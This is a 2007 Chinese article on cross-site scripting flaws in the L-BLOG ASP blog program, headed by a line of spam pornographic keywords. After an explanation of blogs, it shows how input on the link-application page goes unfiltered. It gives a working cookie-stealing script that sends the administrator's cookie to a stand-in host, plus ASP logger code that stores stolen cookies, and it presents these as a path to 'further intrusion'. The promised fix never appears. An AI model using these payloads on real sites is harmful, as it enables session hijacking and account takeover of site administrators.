欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

L-BLOG 漏洞介紹及修復(fù)(圖)

 更新時間:2007年01月16日 00:00:00   作者:  

首先說說的是什么是blog(博客)?因為很多人都不知道blog是什么?就算看完了這篇文章都不明白,所以浪費一些篇幅!
釋義:
    網(wǎng)絡(luò)出版(Web Publishing)、發(fā)表和張貼(Post——這個字當(dāng)名詞用時就是指張貼的文章)文章是個急速成長的網(wǎng)絡(luò)活動,現(xiàn)在甚至出現(xiàn)了一個用來指稱這種網(wǎng)絡(luò)出版和發(fā)表文章的專有名詞——Weblog,或Blog。一個Blog就是一個網(wǎng)頁,它通常是由簡短且經(jīng)常更新的Post所構(gòu)成;這些張貼的文章都按照年份和日期排列。Blog的內(nèi)容和目的有很大的不同,從對其他網(wǎng)站的超級鏈接和評論,有關(guān)公司、個人、構(gòu)想的新聞到日記、照片、詩歌、散文,甚至科幻小說的發(fā)表或張貼都有。許多Blogs是個人心中所想之事情的發(fā)表,其它Blogs則是一群人基于某個特定主題或共同利益領(lǐng)域的集體創(chuàng)作。Blog好象對網(wǎng)絡(luò)傳達(dá)的實時訊息。撰寫這些Weblog或Blog的人就叫做Blogger或Blog writer。在網(wǎng)絡(luò)上發(fā)表Blog的構(gòu)想使于1998年,但到了2000年才真正開始流行。起初,Bloggers將其每天瀏覽網(wǎng)站的心得和意見記錄下來,并予以公開,來給其它人參考和遵循。但隨著Blogging快速擴張,它的目的與最初已相去甚遠(yuǎn)。目前網(wǎng)絡(luò)上數(shù)以千計的 Bloggers發(fā)表和張貼Blog的目的有很大的差異。不過,由于溝通方式比電子郵件、討論群組更簡單和容易,Blog已成為家庭、公司、部門和團隊之間越來越盛行的溝通工具,因為它也逐漸被應(yīng)用在企業(yè)內(nèi)部網(wǎng)絡(luò)(Intranet)。
    現(xiàn)在在網(wǎng)絡(luò)上使用的blog程序大致分為多用戶和單用戶兩個版本,ASP的Blog程序以及版本都比較多,自然而然的就會存在著各種各樣的漏洞??!現(xiàn)在主流的ASP Blog程序有以下幾種:

1.L-BLOG (Loveyuki編寫的ASP+ACCESS架構(gòu)),這個程序的修改以及美化版本N多
2.O-BLOG(葉開編寫的ASP+ACCESS/SQL架構(gòu)多用戶)
3.Misslong(多用戶版本)
4.theanswer‘s blog(外國開源網(wǎng)站項目程序,代碼謹(jǐn)慎簡潔)
5.SIC's blog(L-BLOG的修改版本,安全性能都比原作強)
6.Dlong(豬飛飛編寫的程序?qū)儆诒容^早的blog程序,停止開發(fā)了)

我就拿L-BLOG程序來進行分析!看看我們的L-BLOG有多少問題?

一.L-BLOG程序漏洞.(跨站式腳本漏洞)
   使用最廣的程序就會有更多的漏洞存在,我們L-BLOG程序也是一樣?。?!首先看看的就是基本的漏洞跨站式腳本漏洞,在Member.asp/favorite.asp/bloglinks.asp頁面里面發(fā)現(xiàn),作者并沒有為了防止跨站腳本的漏洞,所以完全沒有過濾到任何的敏感字符,借此我們就可以進行COOKIE的盜取,以及對于BLOG的破壞了!
    我們就拿Member.asp頁面的“個人主頁”欄目設(shè)置作為例子,我們發(fā)現(xiàn)只要輸入特定惡意代碼,這樣子就可以拿到管理員的COOKIE或者進行破壞!例如:<script>alert("TEST.BY.H4K_B4N");</script>在個人主頁欄目的時候



當(dāng)管理員或者其他用戶查看我們設(shè)定的帳號資料的時候,代碼的就會啟動,這樣子就完成了跨展腳本的攻擊了!


    在三個頁面當(dāng)中危害性最大的就是bloglinks.asp添加連接頁面,只要在申請連接的地址輸入惡意代碼,就可以直接拿到管理員的COOKIE了,因為每個連接都需要經(jīng)過管理員的審核才可以,這樣子每當(dāng)管理員登陸admincp.asp管理后臺的相關(guān)頁面就會啟動代碼從而得到我們需要的COOKIE了!
代碼如下:
<script> document.location='http://yoursite.com/cookie.asp?'%2Bdocument.cookie
</script>

COOKIE頁面代碼:
<% 
Testfile=server.mappath("info.txt")
Msg=request.servervariables("QUERY_STRING")
Set fs=server.createobject("scripting.filesystemobject")
Set thisfile=fs.opentextfile(testfile,8,true,0)
Thidfile.writeline(""&msg&"")
Thisfile.close
Set fs=nothing
%>
利用以上的代碼,我們就可以很輕松的拿到管理員的COOKIE資料,進行進一步的入侵了。

相關(guān)文章

最新評論